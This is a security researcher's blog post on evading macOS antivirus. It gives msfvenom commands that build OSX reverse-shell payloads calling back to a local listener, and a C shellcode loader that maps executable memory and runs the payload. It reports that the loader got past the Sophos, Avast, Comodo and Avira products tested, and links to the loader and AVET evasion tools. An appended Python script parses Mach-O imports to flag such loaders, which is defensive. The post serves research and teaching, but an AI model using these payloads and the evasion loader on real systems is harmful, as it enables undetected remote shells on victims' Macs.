danielsauder

IT security is a matter of trust.

Antivirus Evasion on OSX

A few months ago I did some research on antivirus (evasion) on OSX and now I decided to write a blog post about it.

Scope
* build executables that are not recognized by antivirus software on Mac OSX
* for building Mac OSX executables you need Mac OSX
* shellcode/payload generated with MSF
* developed in C and some assembly
* main focus is learning and automation

Why?
Some high profile targets use OSX… so AV might be a thing.

Dmitry Medvedev:

http://obamapacman.com/2009/08/russia-president-dmitry-medvedev-mac-user-kremlin/

As do some security researchers 😉

Charlie Miller:

https://en.wikipedia.org/wiki/Charlie_Miller_(security_researcher)#/media/File:CharlieMillerHolmanSpeaker2015-20.jpg

Targeted Malware

… or like APT 28:

Bitdefender whitepaper: Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf

Test Cases and PoCs
* eicar
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho -o osx64_reverse_xor.out
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -f macho -o osx64_reverse.out
* msfvenom -p osx/x86/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 --platform OSX -f macho -o osx86_reverse.out
* gcc -o osx64_sc_binder.out osx64_sc_binder.c

osx64_sc_binder.c

#include <string.h>
#include <sys/mman.h>

/* msfvenom-generated shellcode; the full byte array is elided in the post */
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xf2\xff\xff\xff\x48\x8d\x05\xef\xff"
...
"\x15";

int main(int argc, char **argv)
{
  /* anonymous page mapped readable, writable and executable */
  void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
  /* copy the shellcode into the page and call it as a function */
  memcpy(ptr, buf, sizeof buf);
  void (*fp)() = (void (*)())ptr;
  fp();
  return 0;
}

And then some testing…

Comodo
… found nothing, only eicar.

Sophos
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c

Avast
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c

Avira
Not recognized:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho -o a.out
… no further testing.

Finally
As can be seen, not much effort is needed to evade AV software on Mac OSX. The shellcode binder was enough to evade all tested products.
The binder: https://github.com/govolution/avepoc/blob/master/osx64_sc_binder.c
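The results above show that the products tested relied on static signatures for the msfvenom-generated Mach-O and had nothing for a freshly compiled binder. As an added defender's-side example (not from the post or the avepoc repository), here is a small Python triage script that parses a thin little-endian x86-64 Mach-O, lists its undefined external symbols, and flags the mmap/mprotect imports a plain loader like the one above depends on; the sample image is constructed inline, and the SUSPICIOUS set is an assumed heuristic.

```python
import struct

MH_MAGIC_64 = 0xFEEDFACF          # little-endian 64-bit Mach-O header magic
LC_SYMTAB = 0x2                   # load command carrying symbol and string tables
N_TYPE, N_EXT, N_UNDF = 0x0E, 0x01, 0x00
SUSPICIOUS = {"_mmap", "_mprotect"}   # assumed heuristic: imports a plain loader needs for RWX memory


def undefined_imports(data: bytes) -> list:
    """Names of undefined external symbols (i.e. imports) in a thin 64-bit Mach-O."""
    magic, _cpu, _sub, _ftype, ncmds, _, _, _ = struct.unpack_from("<IiiIIIII", data, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("not a little-endian 64-bit Mach-O image")
    off, names = 32, []               # sizeof(mach_header_64) == 32
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmd == LC_SYMTAB:
            symoff, nsyms, stroff, _strsize = struct.unpack_from("<IIII", data, off + 8)
            for i in range(nsyms):    # each nlist_64 entry is 16 bytes
                n_strx, n_type = struct.unpack_from("<IB", data, symoff + 16 * i)
                if (n_type & N_TYPE) == N_UNDF and (n_type & N_EXT):
                    start = stroff + n_strx
                    names.append(data[start:data.index(b"\0", start)].decode())
        off += cmdsize
    return names


def triage(data: bytes) -> list:
    """Imports from SUSPICIOUS present in the image; a non-empty result means 'look closer'."""
    return sorted(set(undefined_imports(data)) & SUSPICIOUS)


def build_sample() -> bytes:
    """Constructed minimal Mach-O (header + LC_SYMTAB only) with the binder's imports."""
    strtab = b"\0_main\0_mmap\0_memcpy\0"
    # (n_strx, n_type): _main defined in a section, _mmap and _memcpy undefined externals
    syms = b"".join(struct.pack("<IBBHQ", strx, ntype, 0, 0, 0)
                    for strx, ntype in ((1, 0x0F), (7, 0x01), (13, 0x01)))
    symoff = 32 + 24                                  # header + one 24-byte LC_SYMTAB
    header = struct.pack("<IiiIIIII", MH_MAGIC_64, 0x01000007, 3, 2, 1, 24, 0, 0)
    symtab = struct.pack("<IIIIII", LC_SYMTAB, 24, symoff, 3, symoff + len(syms), len(strtab))
    return header + symtab + syms + strtab


if __name__ == "__main__":
    print(undefined_imports(build_sample()))   # ['_mmap', '_memcpy']
    print(triage(build_sample()))              # ['_mmap']
```

Fat (universal) binaries and 32-bit images are not handled, and JIT engines import mmap with PROT_EXEC legitimately, so treat a hit as a triage signal to combine with code-signing status and behaviour, not as a verdict.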

Nevertheless I made a small PoC version of AVET (based on the old version 1.3) for OSX (https://github.com/govolution/avetosx):

Maybe I will try to integrate it in AVET 2 some time.
